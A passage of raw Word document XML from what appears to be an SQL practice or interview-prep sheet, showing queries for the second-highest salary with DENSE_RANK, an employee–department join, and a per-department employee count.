          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ORDER</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>BY</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> salary </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DESC</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>AS</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> rnk</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> employee</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>) ranked</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> rnk = </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="1C00CF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCC042A" w14:textId="7F43A088" w:rsidR="00EF587F" w:rsidRPr="00393B05" w:rsidRDefault="00EF587F" w:rsidP="00347934">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DENSE_RANK() handles duplicates properly (e.g., if 2 employees have the same highest salary).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D98605F" w14:textId="128E9C6A" w:rsidR="0025066D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0025066D">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D7CF482">
          <v:rect id="_x0000_i2958" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F783D1" w14:textId="10C8921F" w:rsidR="008568CE" w:rsidRPr="00CE4B95" w:rsidRDefault="008568CE" w:rsidP="00F45251">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="701" w:name="_Toc196308181"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r w:rsidR="00B40912" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>uery</w:t>
      </w:r>
      <w:r w:rsidR="009D0BA4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - p</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>rint employee id, employee_name, depatment_name Employee - employee_id, employee_name, department_id</w:t>
      </w:r>
      <w:bookmarkEnd w:id="701"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B7CEDD" w14:textId="29EB130A" w:rsidR="008568CE" w:rsidRPr="00CE4B95" w:rsidRDefault="008568CE" w:rsidP="00F45251">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="702" w:name="_Toc196308182"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Department - department_id, department_name?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="702"/>
    </w:p>
    <w:p w14:paraId="0787CAAE" w14:textId="4B772B75" w:rsidR="008568CE" w:rsidRPr="00CE4B95" w:rsidRDefault="008568CE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5071DE25" w14:textId="40E26281" w:rsidR="00E84238" w:rsidRPr="00CE4B95" w:rsidRDefault="00E84238" w:rsidP="00E84238">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SELEC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00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    e.employee_id,</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    e.employee_name,</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    d.department_name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM</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00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    Employee e</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>JOI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00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    Department d</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>O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00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    e.department_id = d.department_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1961DE24" w14:textId="273B3CE5" w:rsidR="009D0BA4" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0025066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AC10E20">
          <v:rect id="_x0000_i2959" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C7562B" w14:textId="2E256701" w:rsidR="00275317" w:rsidRPr="00CE4B95" w:rsidRDefault="00275317" w:rsidP="00275317">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="703" w:name="_Toc196308183"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>SQ</w:t>
      </w:r>
      <w:r w:rsidR="00581520" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009C1693" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="00581520" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">ry </w:t>
      </w:r>
      <w:r w:rsidR="009C1693" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00B94444" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">ind department name and number of </w:t>
      </w:r>
      <w:r w:rsidR="00E40516" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>employees</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in that department?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="703"/>
    </w:p>
    <w:p w14:paraId="77416EDC" w14:textId="5577C25E" w:rsidR="00275317" w:rsidRPr="00CE4B95" w:rsidRDefault="00275317" w:rsidP="00275317">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AE21CA1" w14:textId="77777777" w:rsidR="00E84238" w:rsidRPr="00CE4B95" w:rsidRDefault="00E84238" w:rsidP="005812BA">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> d.department_name, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>COUNT</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(e.employee_id) </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AS</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> employee_count</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> employees e</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> departments d </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ON</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> e.department_id = d.department_id</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GROUP</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AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BY</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> d.department_name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B54FE4B" w14:textId="0A27C122" w:rsidR="0025066D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00275317">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A996797">
          <v:rect id="_x0000_i2960" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1236A223" w14:textId="28A1F16C" w:rsidR="008568CE" w:rsidRPr="00CE4B95" w:rsidRDefault="00652D53">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
